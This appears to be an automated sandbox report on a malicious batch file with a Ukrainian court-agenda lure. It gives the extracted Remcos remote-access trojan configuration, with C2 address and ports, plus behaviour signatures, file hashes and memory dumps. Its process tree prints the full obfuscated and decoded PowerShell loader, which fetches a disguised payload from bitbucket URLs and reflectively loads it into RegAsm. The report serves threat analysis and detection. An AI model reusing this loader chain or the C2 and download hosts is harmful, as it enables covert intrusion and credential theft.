Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-09-2024 12:13

General

  • Target

    Порядок денний до суду.bat

  • Size

    13KB

  • MD5

    22865eb508afb7fabbe06e656568150d

  • SHA1

    82e2ce104c874210918d8d1b63f663d353d3d7ac

  • SHA256

    0b6ff11b6bb77a2b5fddd259c021c80096d681e955468e342435ab93d1743cd7

  • SHA512

    ba8bfab7e32d420c3b38e330f764bea7b2a06d10f2a5880330b16ecdeb2466e52a0661f7559492e97b3825709164f446601db74a6615e0700cdc642a35c3f301

  • SSDEEP

    192:XlNQXHDDlrxLsbGOlfs/m+jGuqHswuVIJHjMfqxnJvMuz3DPPygGYlp868OwTXY4:3QX2N5FCwuOme0ufy4ioWI7uF4w

Malware Config

Extracted

Family

remcos

Botnet

hst_one

C2

101.99.93.108:2404

101.99.93.108:1723

101.99.93.108:8080

101.99.93.108:8091

101.99.93.108:80

101.99.93.108:465

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    rmc

  • mouse_option

    false

  • mutex

    gdrgfddghgfd-FLRWT9

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Порядок денний до суду.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2984
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#LgBq#H##Zw#/#DE#MQ#4#DE#MQ#3#DM#NQ#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBi#Gk#d#Bi#HU#YwBr#GU#d##u#G8#cgBn#C8#a#Bn#GQ#ZgBo#GQ#ZgBn#GQ#LwB0#GU#cwB0#C8#Z#Bv#Hc#bgBs#G8#YQBk#HM#LwBu#GU#dwBf#Gk#bQBh#Gc#ZQ#u#Go#c#Bn#D8#MQ#0#DQ#N##x#Dc#Mg#z#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#D0#I#BE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQBG#HI#bwBt#Ew#aQBu#Gs#cw#g#CQ#b#Bp#G4#awBz#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##t#G4#ZQ#g#CQ#bgB1#Gw#b##p#C##ew#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#I##k#GU#bgBk#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#p#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#GU#bgBk#EY#b#Bh#Gc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQBn#HQ#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#KQ#g#Hs#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##r#D0#I##k#HM#d#Bh#HI#d#BG#Gw#YQBn#C4#T#Bl#G4#ZwB0#Gg#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#C##PQ#g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##LQ#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#L##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YgBh#HM#ZQ#2#DQ#QwBv#G0#bQBh#G4#Z##p#Ds#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#p#Ds#I##k#HQ#eQBw#GU#I##9#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#LgBH#GU#d#BU#Hk#c#Bl#Cg#JwB0#GU#cwB0#H##bwB3#GU#cgBz#Gg#ZQBs#Gw#LgBI#G8#bQBl#Cc#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#G0#ZQB0#Gg#bwBk#C##PQ#g#CQ#d#B5#H##ZQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBs#GE#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I##o#Cc#d#B4#HQ#LgBl#G4#bw#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#ZQBn#GQ#cw#v#Hc#ZwBk#HM#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBz#HY#a#Bv#HM#d##n#Cw#I##n#FI#ZQBn#EE#cwBt#Cc#L##g#Cc#M##n#Ck#KQB9#H0#';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?11811735', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.eno/sdaolnwod/egds/wgds/gro.tekcubtib//:sptth', '0', 'svhost', 'RegAsm', '0'))}}"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5540
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3136
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\gcimrzhkcuvocgklxgfbz"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3584
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\qenxsssmqcnbenyxojzdkdke"
            5⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:4948
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\bybqtkcflkfgobvbxumwnqevxcp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5052

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\rmc\logs.dat

    Filesize

    326B

    MD5

    12c79ca73e70d55c4b12dbb56937ffb5

    SHA1

    80d5c94245caca468803a1b85b5d192b9d892f99

    SHA256

    bce3ef63b8d728252e2a5a8c659e5a2a55ada5e375bdb3372c79b55472d51ecc

    SHA512

    2110d5f426b02275b3cfe9ac4fbcdfbecf115a847e5bf01ccf01d5660289a255bdc620e7851f3b0b748dbce7c536ad43453fbda210c26d728f902964c42bee3d

  • C:\ProgramData\rmc\logs.dat

    Filesize

    198B

    MD5

    a8d9e38562cb20b29e6d4bc4240ae910

    SHA1

    cc5ce00a939f75d070c12df14a4c27669806fabc

    SHA256

    676c6b291f042a5e500892948ef0f241aa1509022bfa3458ea86484619823f1e

    SHA512

    ac6316f3f97c39bcca3266072165494ef0bda9f866c2dc0daaad5b250792c722d8c105edff5cdeba771b5d864e61e1f4781670ce98062683cfe64b68d4c666d1

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    fc3f093970de5d1b8f6c154bff30dc11

    SHA1

    2d84a0ffb141ea97a99d1ea939a476c6d40ea5d1

    SHA256

    c3648ab9cdcb530f2c792269b7212d9b33accab91297e94e709043d78d0a224c

    SHA512

    ff45a66d5555a375cf650fb686f3de335bb827f572a41138ae9ad7e406a84afebf8fd66e5810f5a40ea582d5d6d27711b9a9cb270ddfa8361224013d5d38f51e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    50a8221b93fbd2628ac460dd408a9fc1

    SHA1

    7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

    SHA256

    46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

    SHA512

    27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lo14y5qv.fgm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\gcimrzhkcuvocgklxgfbz

    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • memory/1548-12-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-0-0x00007FFF2A5F3000-0x00007FFF2A5F5000-memory.dmp

    Filesize

    8KB

  • memory/1548-11-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-10-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-45-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-26-0x00007FFF2A5F3000-0x00007FFF2A5F5000-memory.dmp

    Filesize

    8KB

  • memory/1548-27-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/1548-1-0x000001CFE8E80000-0x000001CFE8EA2000-memory.dmp

    Filesize

    136KB

  • memory/3136-82-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-98-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-38-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-40-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-39-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-34-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-141-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-140-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-28-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-133-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-46-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-47-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-48-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-49-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-52-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-53-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-132-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-125-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-124-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-117-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-116-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-109-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-108-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-99-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-31-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-91-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-90-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-75-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/3136-74-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/3136-76-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-71-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/3136-78-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3136-83-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/3584-63-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3584-59-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3584-54-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3584-57-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/4948-60-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4948-64-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4948-55-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/5052-62-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5052-61-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5052-56-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5540-22-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/5540-21-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/5540-24-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/5540-23-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/5540-25-0x00000150CCE10000-0x00000150CCE4E000-memory.dmp

    Filesize

    248KB

  • memory/5540-32-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB

  • memory/5540-41-0x00007FFF2A5F0000-0x00007FFF2B0B2000-memory.dmp

    Filesize

    10.8MB